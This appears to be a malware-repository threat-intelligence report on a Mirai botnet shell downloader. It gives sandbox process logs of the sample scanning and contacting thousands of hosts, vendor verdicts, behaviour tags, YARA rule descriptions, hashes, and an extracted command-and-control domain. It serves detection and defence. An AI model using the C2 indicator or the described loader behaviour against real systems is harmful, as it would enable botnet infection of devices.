pid=5268->guuid=d13b2362-1f00-0000-6cd7-e77794140000 pid=5268|send-data send guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269|send-data send-data to 4096 IP addresses review logs to see them all guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269->guuid=66fe2862-1f00-0000-6cd7-e77795140000 pid=5269|send-data send guuid=11281b64-1f00-0000-6cd7-e77796140000 pid=5270->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=171c5b1b-2500-0000-6cd7-e777c1140000 pid=5313 /tmp/loudscream guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273->guuid=171c5b1b-2500-0000-6cd7-e777c1140000 pid=5313 clone guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314 /tmp/loudscream net send-data zombie guuid=31a5236a-1f00-0000-6cd7-e77799140000 pid=5273->guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314 clone guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 70B guuid=3a346f1b-2500-0000-6cd7-e777c3140000 pid=5315 /tmp/loudscream guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314->guuid=3a346f1b-2500-0000-6cd7-e777c3140000 pid=5315 clone guuid=1d31741b-2500-0000-6cd7-e777c5140000 pid=5317 /tmp/loudscream guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314->guuid=1d31741b-2500-0000-6cd7-e777c5140000 pid=5317 clone guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318 /tmp/loudscream net net-scan send-data zombie guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314->guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318 clone guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319 /tmp/loudscream net net-scan send-data zombie guuid=efb0601b-2500-0000-6cd7-e777c2140000 pid=5314->guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319 clone guuid=5771701b-2500-0000-6cd7-e777c4140000 pid=5316->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318|send-data send-data to 2720 IP addresses review logs to see them all guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318->guuid=8c5d781b-2500-0000-6cd7-e777c6140000 pid=5318|send-data send guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319|send-data send-data to 4097 IP addresses review logs to see them all guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319->guuid=02897b1b-2500-0000-6cd7-e777c7140000 pid=5319|send-data send guuid=a117e71e-2500-0000-6cd7-e777c8140000 pid=5320->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con guuid=ce0f5ecd-2a00-0000-6cd7-e777f8140000 pid=5368 /tmp/loudscream guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323->guuid=ce0f5ecd-2a00-0000-6cd7-e777f8140000 pid=5368 clone guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369 /tmp/loudscream net send-data zombie guuid=ea2bd721-2500-0000-6cd7-e777cb140000 pid=5323->guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369 clone guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 70B guuid=086784cd-2a00-0000-6cd7-e777fb140000 pid=5371 /tmp/loudscream guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369->guuid=086784cd-2a00-0000-6cd7-e777fb140000 pid=5371 clone guuid=340c8bcd-2a00-0000-6cd7-e777fc140000 pid=5372 /tmp/loudscream guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369->guuid=340c8bcd-2a00-0000-6cd7-e777fc140000 pid=5372 clone guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373 /tmp/loudscream net net-scan send-data zombie guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369->guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373 clone guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374 /tmp/loudscream net net-scan send-data zombie guuid=dac862cd-2a00-0000-6cd7-e777f9140000 pid=5369->guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374 clone guuid=477c74cd-2a00-0000-6cd7-e777fa140000 pid=5370->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373|send-data send-data to 2509 IP addresses review logs to see them all guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373->guuid=dd7f8fcd-2a00-0000-6cd7-e777fd140000 pid=5373|send-data send guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374|send-data send-data to 4097 IP addresses review logs to see them all guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374->guuid=54cf93cd-2a00-0000-6cd7-e777fe140000 pid=5374|send-data send guuid=710a77d0-2a00-0000-6cd7-e777ff140000 pid=5375->48d9480c-af89-5d68-89eb-f592f08ead5f con guuid=7b151fd4-2a00-0000-6cd7-e77702150000 pid=5378->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=7b151fd4-2a00-0000-6cd7-e77702150000 pid=5378->ad7f156b-fc2d-56ee-9049-c6109de3ade6 con
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2026-03-27 15:20:18 UTC
File Type:
Text (Shell)
AV detection:
21 of 36 (58.33%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=xmnelokwkikkah4p4aifqtl77vimlpooxmrzln5egxfnqrajhoyq._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet:ecchi antivm botnet credential_access defense_evasion discovery linux upx
Link:
https://tria.ge/reports/260327-sr1snsb13j/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Checks CPU configuration
Reads system network configuration
Reads process memory
UPX packed file
Enumerates active TCP sockets
Enumerates running processes
File and Directory Permissions Modification
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (50075) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware Config
C2 Extraction:
bitches.gunna.pro
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/bb1a45b95652/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.65
Link:
https://yomi.yoroi.company/submissions/bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders
Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh bb1a45b9565214a01f8fe010584d7ffd50c5bdcebb2395b7a435cad844093bb1

(this sample)

Mirai

elf 1a675737eab617a53c0eea787c995662598d1457ce99efbe306b7d8d28e4d372

  
URLhaus
https://urlhaus.abuse.ch/url/3806384/
  
Delivery method
Distributed via web download
  
Dropping
MD5 ddc5a31b22ff8064abc1929b6bf52fe2
  
Dropping
SHA256 1a675737eab617a53c0eea787c995662598d1457ce99efbe306b7d8d28e4d372

Comments